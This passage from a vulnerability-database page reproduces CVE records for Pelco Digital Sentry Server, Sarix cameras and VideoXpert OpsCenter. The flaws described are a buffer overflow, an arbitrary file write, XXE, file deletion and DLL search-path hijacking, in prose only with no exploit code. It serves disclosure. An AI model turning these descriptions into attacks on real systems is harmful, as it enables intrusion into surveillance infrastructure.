VideoXpert OpsCenter versions prior to 3.1
|
Date Public
2019-03-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.645Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "VideoXpert OpsCenter versions prior to 3.1",
"vendor": "VideoXpert",
"versions": [
{
"status": "affected",
"version": "VideoXpert OpsCenter versions prior to 3.1"
}
]
}
],
"datePublic": "2019-03-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A Uncontrolled Search Path Element (CWE-427) vulnerability exists in VideoXpert OpsCenter versions prior to 3.1 which could allow an attacker to cause the system to call an incorrect DLL."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Uncontrolled Search Path Element",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-22T19:24:55.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7840",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "VideoXpert OpsCenter versions prior to 3.1",
"version": {
"version_data": [
{
"version_value": "VideoXpert OpsCenter versions prior to 3.1"
}
]
}
}
]
},
"vendor_name": "VideoXpert"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Uncontrolled Search Path Element (CWE-427) vulnerability exists in VideoXpert OpsCenter versions prior to 3.1 which could allow an attacker to cause the system to call an incorrect DLL."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Uncontrolled Search Path Element"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01",
"refsource": "MISC",
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7840",
"datePublished": "2019-05-22T19:24:55.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2024-08-05T06:37:59.645Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-27232 (GCVE-0-2021-27232)
Vulnerability from nvd – Published: 2021-02-16 14:28 – Updated: 2024-08-03 20:48
VLAI
Summary
The RTSPLive555.dll ActiveX control in Pelco Digital Sentry Server 7.18.72.11464 has a SetCameraConnectionParameter stack-based buffer overflow. This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The victim would have to visit a malicious webpage using Internet Explorer where the exploit could be triggered.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://support.pelco.com/s/article/What-is-the-D… | x_refsource_MISC |
| https://github.com/vitorespf/Advisories/blob/mast… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:48:15.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The RTSPLive555.dll ActiveX control in Pelco Digital Sentry Server 7.18.72.11464 has a SetCameraConnectionParameter stack-based buffer overflow. This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The victim would have to visit a malicious webpage using Internet Explorer where the exploit could be triggered."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-16T14:28:40.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-27232",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The RTSPLive555.dll ActiveX control in Pelco Digital Sentry Server 7.18.72.11464 has a SetCameraConnectionParameter stack-based buffer overflow. This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The victim would have to visit a malicious webpage using Internet Explorer where the exploit could be triggered."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history",
"refsource": "MISC",
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"name": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt",
"refsource": "MISC",
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-27232",
"datePublished": "2021-02-16T14:28:40.000Z",
"dateReserved": "2021-02-16T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:48:15.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-27197 (GCVE-0-2021-27197)
Vulnerability from nvd – Published: 2021-02-12 15:51 – Updated: 2024-08-03 20:40
VLAI
Summary
DSUtility.dll in Pelco Digital Sentry Server before 7.19.67 has an arbitrary file write vulnerability. The AppendToTextFile method doesn't check if it's being called from the application or from a malicious user. The vulnerability is triggered when a remote attacker crafts an HTML page (e.g., with "OBJECT classid=" and "<SCRIPT language='vbscript'>") to overwrite arbitrary files.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://support.pelco.com/s/article/What-is-the-D… | x_refsource_MISC |
| https://github.com/vitorespf/Advisories/blob/mast… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:40:47.574Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DSUtility.dll in Pelco Digital Sentry Server before 7.19.67 has an arbitrary file write vulnerability. The AppendToTextFile method doesn\u0027t check if it\u0027s being called from the application or from a malicious user. The vulnerability is triggered when a remote attacker crafts an HTML page (e.g., with \"OBJECT classid=\" and \"\u003cSCRIPT language=\u0027vbscript\u0027\u003e\") to overwrite arbitrary files."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-12T15:51:13.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-27197",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "DSUtility.dll in Pelco Digital Sentry Server before 7.19.67 has an arbitrary file write vulnerability. The AppendToTextFile method doesn\u0027t check if it\u0027s being called from the application or from a malicious user. The vulnerability is triggered when a remote attacker crafts an HTML page (e.g., with \"OBJECT classid=\" and \"\u003cSCRIPT language=\u0027vbscript\u0027\u003e\") to overwrite arbitrary files."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history",
"refsource": "MISC",
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"name": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt",
"refsource": "MISC",
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-27197",
"datePublished": "2021-02-12T15:51:13.000Z",
"dateReserved": "2021-02-12T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:40:47.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-27184 (GCVE-0-2021-27184)
Vulnerability from nvd – Published: 2021-02-11 05:38 – Updated: 2024-08-03 20:40
VLAI
Summary
Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\Pelco directory) when DSControlPoint.exe is executed.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://support.pelco.com/s/article/What-is-the-D… | x_refsource_MISC |
| https://github.com/vitorespf/Advisories/blob/mast… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:40:47.394Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\\Pelco directory) when DSControlPoint.exe is executed."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-11T05:38:19.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-27184",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\\Pelco directory) when DSControlPoint.exe is executed."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history",
"refsource": "MISC",
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"name": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt",
"refsource": "MISC",
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-27184",
"datePublished": "2021-02-11T05:38:19.000Z",
"dateReserved": "2021-02-10T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:40:47.394Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-7816 (GCVE-0-2018-7816)
Vulnerability from nvd – Published: 2019-05-22 19:30 – Updated: 2024-08-05 06:37
VLAI
Summary
A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file.
Severity
No CVSS data available.
CWE
- Multiple Vulnerabilities
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Pelco | Pelco Sarix Enhanced and Spectra Enhanced, Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ |
Affected:
Pelco Sarix Enhanced and Spectra Enhanced
Affected: Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ |
Date Public
2019-02-14 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.196Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Pelco Sarix Enhanced and Spectra Enhanced, Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ",
"vendor": "Pelco",
"versions": [
{
"status": "affected",
"version": "Pelco Sarix Enhanced and Spectra Enhanced"
},
{
"status": "affected",
"version": "Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ"
}
]
}
],
"datePublic": "2019-02-14T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Multiple Vulnerabilities",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-22T19:30:57.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7816",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Pelco Sarix Enhanced and Spectra Enhanced, Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ",
"version": {
"version_data": [
{
"version_value": "Pelco Sarix Enhanced and Spectra Enhanced"
},
{
"version_value": "Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ"
}
]
}
}
]
},
"vendor_name": "Pelco"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Multiple Vulnerabilities"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/",
"refsource": "MISC",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7816",
"datePublished": "2019-05-22T19:30:57.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2024-08-05T06:37:59.196Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-7840 (GCVE-0-2018-7840)
Vulnerability from nvd – Published: 2019-05-22 19:24 – Updated: 2024-08-05 06:37
VLAI
Summary
A Uncontrolled Search Path Element (CWE-427) vulnerability exists in VideoXpert OpsCenter versions prior to 3.1 which could allow an attacker to cause the system to call an incorrect DLL.
Severity
No CVSS data available.
CWE
- Uncontrolled Search Path Element
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/ww/en/download… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| VideoXpert | VideoXpert OpsCenter versions prior to 3.1 |
Affected:
VideoXpert OpsCenter versions prior to 3.1
|
Date Public
2019-03-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.645Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "VideoXpert OpsCenter versions prior to 3.1",
"vendor": "VideoXpert",
"versions": [
{
"status": "affected",
"version": "VideoXpert OpsCenter versions prior to 3.1"
}
]
}
],
"datePublic": "2019-03-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A Uncontrolled Search Path Element (CWE-427) vulnerability exists in VideoXpert OpsCenter versions prior to 3.1 which could allow an attacker to cause the system to call an incorrect DLL."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Uncontrolled Search Path Element",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-22T19:24:55.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7840",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "VideoXpert OpsCenter versions prior to 3.1",
"version": {
"version_data": [
{
"version_value": "VideoXpert OpsCenter versions prior to 3.1"
}
]
}
}
]
},
"vendor_name": "VideoXpert"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Uncontrolled Search Path Element (CWE-427) vulnerability exists in VideoXpert OpsCenter versions prior to 3.1 which could allow an attacker to cause the system to call an incorrect DLL."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Uncontrolled Search Path Element"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01",
"refsource": "MISC",
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-071-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7840",
"datePublished": "2019-05-22T19:24:55.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2024-08-05T06:37:59.645Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}